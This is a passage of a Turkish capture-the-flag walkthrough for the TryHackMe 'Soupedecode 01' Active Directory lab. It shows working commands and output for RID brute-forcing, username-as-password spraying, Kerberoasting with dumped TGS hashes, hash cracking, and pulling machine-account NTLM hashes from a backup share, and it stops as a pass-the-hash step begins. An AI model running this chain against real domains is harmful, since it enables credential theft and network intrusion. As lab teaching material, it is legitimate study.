Post

THM - Soupedecode 01

Enumeration

İlk olarak klasik bir TCP port taraması gerçekleştiriyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nmap -p- -Pn -sV -sC -T4 10.114.157.19 -vv -oN tcpscan

53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 126 Microsoft Windows Kerberos (server time: 2026-06-07 13:24:47Z)
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal Services
|_ssl-date: 2026-06-07T13:26:16+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: SOUPEDECODE
|   NetBIOS_Domain_Name: SOUPEDECODE
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: SOUPEDECODE.LOCAL
|   DNS_Computer_Name: DC01.SOUPEDECODE.LOCAL
|   DNS_Tree_Name: SOUPEDECODE.LOCAL
|   Product_Version: 10.0.20348
|_  System_Time: 2026-06-07T13:25:36+00:00
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
| Issuer: commonName=DC01.SOUPEDECODE.LOCAL
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-06-06T13:17:47
| Not valid after:  2026-12-06T13:17:47
| MD5:     fc79 6f2d 7bdd 9689 7ea7 c7ac 613d e47f
| SHA-1:   0fb7 739c beb4 2917 9a68 ec91 b6cf 6a19 2318 42b7
| SHA-256: dd9c b78a 1d4f cc32 d59c 08a0 00ce 5260 f84d c1be 0ae1 901b 3c62 5852 dfa1 4aa1
| -----BEGIN CERTIFICATE-----
| MIIC8DCCAdigAwIBAgIQa7NaENJqTJNLEJx5aiFBTjANBgkqhkiG9w0BAQsFADAh
| ...
|_-----END CERTIFICATE-----
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC over HTTP 1.0
49735/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49852/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2026-06-07T13:25:37
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 44597/tcp): CLEAN (Timeout)
|   Check 2 (port 43041/tcp): CLEAN (Timeout)
|   Check 3 (port 9560/udp): CLEAN (Timeout)
|   Check 4 (port 53753/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─#

Tarama sonucunda dikkat çeken servisler:

  • DNS (53)
  • Kerberos (88)
  • LDAP (389)
  • SMB (445)
  • RDP (3389)

LDAP ve Kerberos servislerinden hedefin bir Active Directory Domain Controller olduğu anlaşılıyor.

1
2
Domain : SOUPEDECODE.LOCAL
Hostname : DC01.SOUPEDECODE.LOCAL

/etc/hosts dosyasına domain bilgisini ekledikten sonra enumerate işlemine devam ediyorum.


SMB Enumeration

İlk kontrol ettiğim nokta SMB oluyor.

Çoğu zaman sistem yöneticileri, Guest hesabını devre dışı bırakmayı unutur veya yanlış yapılandırırlar. Bu da null session üzerinden RID brute force yapmamıza izin veriyor:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'Guest' -p '' --rid-brute | grep User | cut -d "\\" -f 2         
Administrator (SidTypeUser)
Guest (SidTypeUser)
krbtgt (SidTypeUser)
Domain Users (SidTypeGroup)
Protected Users (SidTypeGroup)
DC01$ (SidTypeUser)
bmark0 (SidTypeUser)
otara1 (SidTypeUser)
kleo2 (SidTypeUser)

Binlerce kullanıcı var usernames.txt olarak kaydedeceğim.

1
nxc smb 10.114.157.19 -u 'Guest' -p '' --rid-brute | grep User | cut -d "\\" -f 2 | awk '{print$1}' > usernames.txt

Artık elimizde kullanıcı listesi bulunuyor.


Username = Password Kontrolü

Basit ama oldukça etkili bir teknik olan username:username kombinasyonunu deniyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u usernames.txt -p usernames.txt --no-bruteforce                            
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\Guest:Guest STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\krbtgt:krbtgt STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\DC01$:DC01$ STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\bmark0:bmark0 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\otara1:otara1 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\kleo2:kleo2 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\eyara3:eyara3 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\pquinn4:pquinn4 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\jharper5:jharper5 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\bxenia6:bxenia6 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\gmona7:gmona7 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\oaaron8:oaaron8 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\pleo9:pleo9 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\evictor10:evictor10 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\wreed11:wreed11 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\bgavin12:bgavin12 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\ndelia13:ndelia13 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\akevin14:akevin14 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\kxenia15:kxenia15 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\ycody16:ycody16 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\qnora17:qnora17 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\dyvonne18:dyvonne18 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\qxenia19:qxenia19 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\rreed20:rreed20 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\icody21:icody21 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\ftom22:ftom22 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\ijake23:ijake23 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\rpenny24:rpenny24 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\jiris25:jiris25 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\colivia26:colivia26 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\pyvonne27:pyvonne27 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\zfrank28:zfrank28 STATUS_LOGON_FAILURE 
SMB         10.114.157.19   445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317 
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# 

Sonuç:

1
[+] SOUPEDECODE.LOCAL\ybob317:ybob317

İlk geçerli domain hesabını elde etmiş oldum.


Kerberoasting

Domain kullanıcısıyla artık SPN sahibi servis hesaplarını sorgulayabiliyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kali)-[~/thm/soupedecode]
└─# impacket-GetUserSPNs soupedecode.local/ybob317:'ybob317' -dc-ip 10.114.157.19 -no-pass -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------  --------------  --------  --------------------------  --------------------------  ----------
FTP/FileServer          file_svc                  2024-06-17 13:32:23.726085  2026-06-07 09:59:15.222452             
FW/ProxyServer          firewall_svc              2024-06-17 13:28:32.710125  <never>                                
HTTP/BackupServer       backup_svc                2024-06-17 13:28:49.476511  <never>                                
HTTP/WebServer          web_svc                   2024-06-17 13:29:04.569417  <never>                                
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 13:29:18.511871  <never>                                



[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$soupedecode.local/file_svc*$5f891c8e99e4d32724615372d69bc201$ab83dda467009ce70aca35cad7051be0791476688837769d96d50079ee50c39495552f0e708e022de2c8ac2f434c802fdf963eb94fac1e8425326f0bda027ed090327f5f05aa10a64292372f6d226733e7c62c1c3fed544501a5437c6ca28d21544af930aab09cde95c8097429b5d3d89e7a354510a6d7ec385c426d97f6cac2f00ef35eca0ad755911e8c96d596ecff789e8027510c9d88f8405e2f7277f42d8f2d6c6b18cf1cfa2e6f417a407abc738cf3c3727c7d8ee8ed2a3674b63f32f528048c9895dd16792095c6882c51aa664d645bfc7b1224dcdd5ad6cb3d77af4671395a9ac0be2889a1eb35a321e3ffce9ee44b5615b1e92e1b8b9c611e57af92560e39ed387904e2fdaf72b7e2c461976e9f618ddf939753b65d7edf7e14e897f86cf16e0970d711363d652e54a1172e3c1d4ea097258898834a852a236ac133f7bb4cc25dbc76fa20f26757f180c7a5830222e6d3d6202a633e5f1838c97852eef826345c7a99f6418e6b69b2cc8419dc747cd71072fa3f6727c9e1cd6534415685161eccecd111f4367786f7ca680b834f7604fc4d5b764d4aecc7a6e09993b2424b89b7062f74bb1c6e174982898763ccf79e3d2c7a73e2f463d9f9f2317ff7af3213ae8284526360ccada2a140f6bf49504f87f2679ddefe61fa22c4e117bd32ea3a152039e2f68384bca11988cd4873b4ed398100e9636573bda6829e976588c7185b52a503114ef19726372c9228f747b3678ce42e64dd692568d21b2b4550e541ff114df920d973df87cca13e2cbd8691aba522693f4b590b0d6e8cf083d6814a259735066282abcb26130ecdf8a92aeda03c42561a0c536cc2e6412742219f9ad4195f664120a9619ede977936209b52efa72608cb296b1ad1aab1e50c5bedfc5db9a83a36c45072ecfbf8e010ef8fa4efc29ec2b5d03b57e1229008a503aebca3c66c0915daf6a59fcd12fd33a257fac96f510613492fae889f99c3e420cec3d489f2fc06084fa8a764145c493a40ed0690e6cb147c2ce77f7065acc55c88f49d1e1ac9274aefd77fa05df248d2ab099b2fa85ae2c0ea7fba4c112fa01a7453ce33e9d711ecd21700f7ef800e2b321a5780af9de77febb655069b5048ecc29f846e642bec45e8d45a7602a36e2aeba7a99bdab2cbd3a86c2a1210ae06781110ac2a229b35ad41060f3aa2c80737369e256319a36e774c486afbfdc7ed9649774c5f41e62bd3c21ef1f8c16e7488626178dfe941891662c81d553043ad7c6c4efe3b0e5283e89ee0d689d371a91a0a24776da1481b3fdd44a79374f15555233f0cb374c0cf5f720714953e1f6ecc2eb610b2c2991ba266ee028d09b2aba930c2630c3ddc668206a2ba1099c6e0f16336f7c7a846c5b8cd7df9e8e6655296b679c5b1a2dc1067a8a5bad5f2177cf2c92e216206a34218ebfc8116ed46fc41561128364bb812ca323e2470aa57f9788ceb65a749cc41581cf97f33936e4c
$krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$soupedecode.local/firewall_svc*$103f1b87bb88dcbcabb4c4b2211ff9b2$46adbe9b05b9d261a1f360e66af3e39235676e5e8cd44b6a2b36a35499a06a3221bf66d1c16d7fa18bf748f4ba2e0eeb3625a15463f6409ee771d95a9d01b3b7558dff3a29096ac893acac88334fa8e1372e85df9897c99dcbc27c38b46ea7d986c5376da10ff4cfe0f3697c7bafcd4d3297c2a3d2ab118614b1a30f79dd970e28715832408919fca728454cb6c89382b3f097bfd5b8b8784640e223cb31ce223088ba1258ad2c07222e4b9812864e09948dbc9412b3b6e0a9512db0173c683afe8f45a2d38f864a557337ffd3e9c7ad728c94e6d1b829bc0357e7bdededc71b5040e871c1811fac95d485976192fe440cf164d775321de5c49f6b8bc5389d20124f3f77a3cf57b8c27963bf528ded0f75b4ccb8fc197b7a87f6d8d8d2b0598a87fd1fd114d1138b1cdb95b864e9b7d2e257bc731b18a6aad1e25750246c8b03f4497e022958513220c34e5259ea1c239de73c0f25c12e634560df0ba1039b0eb143624ef2095ae0dc075ab2c4bd7288b0c962980752f8f51a55df00992c0803244047a8ea2d0f52be7bbf467408af84c334ae32e9fcae8797b13ffdf6ddabc79f53e9c77b2c57ded17d524db5ef3f1b47a4e476d55471ce660ab8d48c18ed090db93edae5ef5a4bf563278c4fa32385af46d97221dea79460f9781026f3a58db3a30e36240de5cc14c707bb5365c3501b56805461991d5aafcd136274975119e5847b905d5d4637eb59545b59cbda141545d78fff725dfb026f3cb997f4518a6927d96b78c98d033a35d500423e5c0ea2f79ad07e13b81d7b060aa9135b12a27f36effbe8a442e6c7e696bb5565843db75698d9128df42e7a908f907841e079bc86bdcb942d5b546ea031649fdb21251299ecf4cbe70244ab21448fea0b2cd98913fb60d558cb5345d6032ad2a9bf623a5ae9e8d6c7ab20dee8423c8c7f0b694d4436674546bc0d8701975b910addf3983b20ec34b172b390a23eebde7b2dbcd801cd3c7599ec5a359a808e7b33fdeb0f6e6333c345d533e9fc4b100f671ee21d27b5655fb10441f93860582196210eb75d50b041521222785007a079691a9fb9dee0a9fe3d258d42615d01ce1134e99085068b5ced3da82144a27daaa8043ba85f564f6f64c8428736c6ae69f5f67c16554d3749167ab0349dde8db5d1654f552ddc35b5bac04613f6085890df4e4653a649d23863e72bf1db19883d621c8c8b21ab9e177ef340d4d4a9ba2f91c30175c9722d6c5d9ca1e4a1a9ab71731ab54b6c29832e3725191aa3b5cfc5ac6cf68b74eda9c5e3fd64ce5ed404b953a3ee9e1d19549010bb14f2f81a362f39f6e66d3de07290096811bcbe425606c0a17ef6ab5a5a76237fe9bfa08f7ccbdbeca9b233aa8269fb48dc5ee23fbcfe76197a1c9166535ddfa44cf05002e40f97500f40ad33952a005fb003fa292329d2bff9cf734b055f0a8aadf004beb732e4263ca45f57d2cd5444f9ba5a10e1aca1d175ce
$krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$soupedecode.local/backup_svc*$98444fa97797556544feb46a69f852a6$87cc5708c4bed2fffc4a526f2abfc13a5ab6e8e3deaf6a873bad320e276500aee4bead2a6e111f92cecc7e2fe906aa014a3a432def9ace7438e62ac4b9d4aecc584554ad972d030079ee50b52991dae37b84ddaabb45eafac9c055a6b80fde6c5272354885b435f77e53b5d6f5e42152cafd3262b09bb5ca8e92f0fc6a51ddf4dfc33295ff721cbb70ebdf295f38d269702f0bdb79534774be0b48fdf4594d1d5bcb94a7221f6cb581da7c6844c89dbd1cf1ea58a8145233e20364a5b682d7d89c49595e1dc2635ae3d61040082e6aa2825de914cd69f90fe0faafaf3001a3ca4e15b19289bf1f7c2b5abaa7cdb1cbfb85dd74da1bffc6ff6721c21e8eca5283d4dce9f7f23aa0227ac584685fed3f10454c469fa8eca29a09099146ac1ca3602b2f1ad467be76d0bb41d05f2194c96a1a033334311d66982d73f5528b93576a53466dbd4b1efa88237e5a5cf40b884819a582a3f208690eac1fcf550c6286bdf47dce870ad77af0b4b72d446a934b7845801e81186f0f596847bc6c640e418fe5a810f4239825364523ae46a449f926135e41bb06083b3cd8e1a3a92e360f63927bdb01614b8a56bf85c971fc3fe5aaf1eb9a4ac14ad6e40888c47540187b37f414744c0f1eb7edc56c337afa6dab0eb7feb7e93337b2f73aced4faf381deac27e3abce205103b0e31ae44f6dd079093a18303c481b6df89791236ffe3a04956dba092113fc42989496a4aa153540c2489e81c4b5fae0894caed31ba3345a1ee112a53d9e6b14b2189e1dbf85514a64a154c8fb9b91fe4841e72cbf3f194e1a54675302c8b2dfd7c72799cad3f8e2433f923e9f88a9b71bc1322c9f564c22dd129d3c8521ca2034fffe24edaff9479f212555fa8d211f3d08d4c3f805f9d894055f4259459ff3b081e0fec9e41e7fecd7cf7a23ad7eb1a364f0ad0642ea4a44530630581170d6fc3b64f251352211c72dac76d34813b8b3488bccc634797bf4dbae6c2b614855f592a3b2aaf31d1fd1aeb518ca6706818aed187645a9cbaa5030e63f2183e49e5cc37be146a012bd7892fbd87b05613ea3e76669b4e39cc13ad52687e717a153247f6e758d386ffb42aca14c5b93554b816032c7de2085bc78a44b12bd8d21062f3fa63a61d0be947fb4fc8c8e263f5ca9c731dd56e5ac0fa24d8661192c31709601f9493006c7409846e44727f368973f8349f3c26e4e0ebf19b5413b9c09f7f3ce26a8c5022a60fb0bd9c2611858d236bc87f07493163b577c02b37bf0a964617a8e4849a09d97cf9398ce7a7ff1ec49fd412393363086295fdf9585e6896d0e178a7a753484207963ef8588331277e59ffcaadfd0a92689adebd4364d1433896fd36068c5f6f17943924feef2f37f84bb3245d7395a5613e20be9fa15d0b522ed01e0392b3e78b2cbce9fc2e5445d44dfe99c144dd3dabca8b6ed4bcaa2830aadd728dbbab5b8ff4f348516b46f94a35be379b8869189d712
$krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$soupedecode.local/web_svc*$2d5092556cc3af9791093ec8989c6e9f$da4905e290ac7e92e915767a730beae9284a04b7785780fb81b659c784d93c478a6deab3ea801b65525ca7e8e91259a0d2a495de07e768dda278bbf8a37aab00a40b4bf02d2a839c88da5b65faa682f0c9a089dd06e31cf843072347e0b0ff379e063ac8e446445cfc54c45174c3348428eabf0c687733b6483300df8316e07c4414159003e7ddd93537fb6570b5f8210d648fe31d364d80e699b99ecaeb0f1cd5e0a720785747bf4fedc731844ee09c2a9dfcab64887e35f4ba1b036b61c8c4f72e8496e792e1ff8a3499c9b07a08648772d5b298456acd9be31fcfd6d5b3f746730015e1a55e0596d2794ec1cd09fad63a0590c5585dab66847b1619ad3004e2b5f17321d304e22df00715207bfb09e709ff5352eceb8f3647ad226cd0037f56ead76794186c3eb7035b35bc5af0d65cc0fdc23fac898f5be4c59ec6bbc6c79c17db701d5bbaddcc1da5a2331e17814e103c41aeb924ec068131665cf68e6d78f40f842e75f7cfb4499c1377d526b9fa3ebf89bcaf4687504c4b807e6f73d93bbf196149617ae9d546d6bc80d73fb6a639f321e3d893b35e008d4dd4be3fe03353102208e87d987b6e1a32fbe505d6434af60321ed568c9cbf85f79b65ed8bac5b810bb9ced10bb7bb5662ca4fd9e558108c535ad022d597d197cfca788d5d9281999f883c2f59c8573833abb80367a2bda067d6f350211398f0febe0bd05f80516b8b3229c6e717cb943298e8c0e806603aa4c913b9e197fcce68c007b09de754f110d7cf30f55d37e7dc43fa80ecb2e7f7bc562805476aad87c594c648ecf8ab9d6cd8d932720fba41954c490ec2d0f4ed0c63fe8bfe697865c8f7f9a6920e8ff80892edf23e88c4cea400856e2026013405bc70c8306234894b3f746c01e211aaedcc74791385d86686a002c2db350a589d2d6ff1f32dd5c74f4fcfa9c7e7d10cd050a4d828b9c6b7c8532adc8f598b75d3335abfc3be41ccab196f5e75a4ad67a2d160d869a7da10e5a7258a3f0a286081e9686ac7bbbda112751c07c2f18c0af509f122914e27c87a4e48e8fe0a40cf56f6f6665a6a4d195d21525bcffe89b6dcee385adec97d45fa4e61b478c75940efacb3239c850c615472301207aa1e63f84a1cf235f68ff41a98c78021cd96d9e0e28c4e9c5dc4e48c72b79b982fe1b13153ac41a77ad9e860a991310f33d15019ff81cf70361808f1bcc622da393f469d59477f2b0f8577e46579336f65c52b4ec322e3d29656640db590eb4da0d40e1ae8c2fc9597185451b19dd02f7938bdb07d9b2e3a9a03d1bdef69d74998aed531b05f9ca0e30505b0f68b037a6f6ef3c34c910a38eb3fbcc9bf7849532b5b85df58b61a3cf15245cd6c82e738d92ba6e618f6c0feae798e952600fedf42ed71aa7aeae35f5287eddc81ecbb376b102fc3d33633b386cea84097f49dc64e5064075b5642d93a6303285bc1eb5f877857d2ffd23004c191044cea1b651cf2
$krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$soupedecode.local/monitoring_svc*$1e9a5a37ffeb6254b7454c851af174cf$29a846b826fe12e71d1f647806c836d4a44b2bc5b4c71bb8d985ae2bcf9567841df6f1c3cacb6933dc66ffbab84a36eac2da8a42c9b92f5c24d8187802eab837bd3c0d09fa63df8e832e80103c32e3300556fce7219bb3cc74e4283252709d1571c5a0eb254294c1b1d7ef90a769451046c94649af4f3aa96282ac99d59f73957de35785d6180da06c77d0eea2b4594e8684a543c5393070a08b58d222d483ae54fa4a482493f832b6c4b4a978a1616bdb8a362c6ea2047b5f336a0ac1569c00f4ae740ea532ce6d9a661d1fdd26c26d4c9978a3a8dfcb26bd289ae32ec646afb54e840a7184ef849103ba9696c25af288790f6b39f4be4e352b0d2d0d3f62e0e9d1ab95a0951abd4fd2a01ff04aad8620f37a59b443931c5f2f0adfd84bc0ce4f038cd552274976a43b5f0b77c45a18cb2e766499bd5d206b37d9fe847c7c0671146d433cd0eb3e8e8051856eacbe4cbafe44eb5d9c9ac2634dc30d68af2d009938494d1d264f46c4dcf2e7f29a1284505196af5a44be6e045a5b49403fad5acf0cd9ef9301e2176443e5fc81393fcc63a19e9722d515d156392d5f5105cb70f611d518a3a0a6d09f5247c7650c3b59d89a2fc2b41b01d70477cc14ed7ea19dbbc73d40b86ec3971956c31d1bf3c20cd51606d9541afb189309a1eb731c2ad3e6eb896b10fe62a246b39eb0af5a2202ae84dbda525e606126630f29d27e462580c3d9411a684588e763a2533fb82c437b231e7aa204bf2f1868dea71c570eec9318810899b6177e325ec33fc44beceb3fafadeb78b29e6a0da2ea05d30dc9d5f00ab820fdb3759d1d5ea57eafbfd68662e83c918ab93451ca3c858fb507b07e6da0347eaa8705643dff142158be4b40b18ddba327a2219c2770f60a823671efeb59905267833333037313b7eaad245a6957b0ab953f57811b2814b6c3c6719ec1a8322fbf83d105defb85075a2add2736473ea2bb21e3e70da202a53095f6e6822ba467d64880c4abe3c6e81b6610d09ae0b8f0159a447ac59aecc26a6773ab7c155a486d0dfccdcc0458b59657d6272d5cb57be77a465109cedd46ac1c3aaf210820656d61f5a1295a48846272cfc14592c362dcda924270ede1ef81a873db6e00fed4a93626e9ba392f89e40276a1f7e0d298c6d78b3dbf7be6e53883f950b10cf537ebf8de9c24b8b56b9b3821533eef4d729988f5c21783a887967135963c84edb658f2123cce2baf83c6f1c9f5da93ee3a24f8973192e318914826d3fe25d387127df07f447731597acfada903d089b53d92f5c31a25baca9997d07a823aa6df4e4d7146b83614b88362f8effdc9389e8927735e50b618f4cdeb013468e1a92c1ab6615b5d26b616f29a898623dca9aad28abf94c3611b76725ac0ac2204dc658d61247b2fce8ecf4a56425100383f2ac9c0c1b73bb8cd7f6b9cfbdc12f663447cd0a121e37adb0a163af0b3887925608466fd0245bdd5004ade7a96055c
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# 

Birden fazla servis hesabı Kerberoast edilebilir durumda.

  • file_svc
  • firewall_svc
  • backup_svc
  • web_svc
  • monitoring_svc

Araç ilgili TGS hashlerini döndürüyor.

Hashleri Hashcat ile kırıyorum.

1
hashcat -m 13100 hashes.txt wordlist.txt

Sonuç:

1
file_svc : Password123!!

Artık elimde bir servis hesabı bulunuyor.


SMB Shares

Yeni elde ettiğim hesap ile paylaşımları enumerate ediyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'file_svc' -p 'Password123!!' --shares
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Password123!! 
SMB         10.114.157.19   445    DC01             [*] Enumerated shares
SMB         10.114.157.19   445    DC01             Share           Permissions     Remark
SMB         10.114.157.19   445    DC01             -----           -----------     ------
SMB         10.114.157.19   445    DC01             ADMIN$                          Remote Admin
SMB         10.114.157.19   445    DC01             backup          READ            
SMB         10.114.157.19   445    DC01             C$                              Default share
SMB         10.114.157.19   445    DC01             IPC$            READ            Remote IPC
SMB         10.114.157.19   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.114.157.19   445    DC01             SYSVOL          READ            Logon server share 
SMB         10.114.157.19   445    DC01             Users                           
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─#

Dikkat çeken paylaşım:

1
backup

Okuma yetkimiz bulunuyor.

Bağlanıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kali)-[~/thm/soupedecode]
└─# smbclient //10.114.157.19/backup -U 'file_svc'                                                     
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jun 17 13:41:17 2024
  ..                                 DR        0  Fri Jul 25 13:51:20 2025
  backup_extract.txt                  A      892  Mon Jun 17 04:41:05 2024

		12942591 blocks of size 4096. 10704456 blocks available
smb: \> get backup_extract.txt 
getting file \backup_extract.txt of size 892 as backup_extract.txt (3.1 KiloBytes/sec) (average 3.1 KiloBytes/sec)
smb: \> exit
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# cat backup_extract.txt 
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─#

İçerikte tek bir dosya bulunuyor. İçeriği incelediğimde NTLM hashleri görüyorum.

Bu dosya Active Directory içerisindeki machine account hashlerini içeriyor.


Pass-the-Hash

Hashlerin halen geçerli olup olmadığını test ediyorum.

1
2
3
4
5
6
7
8
9
10
11
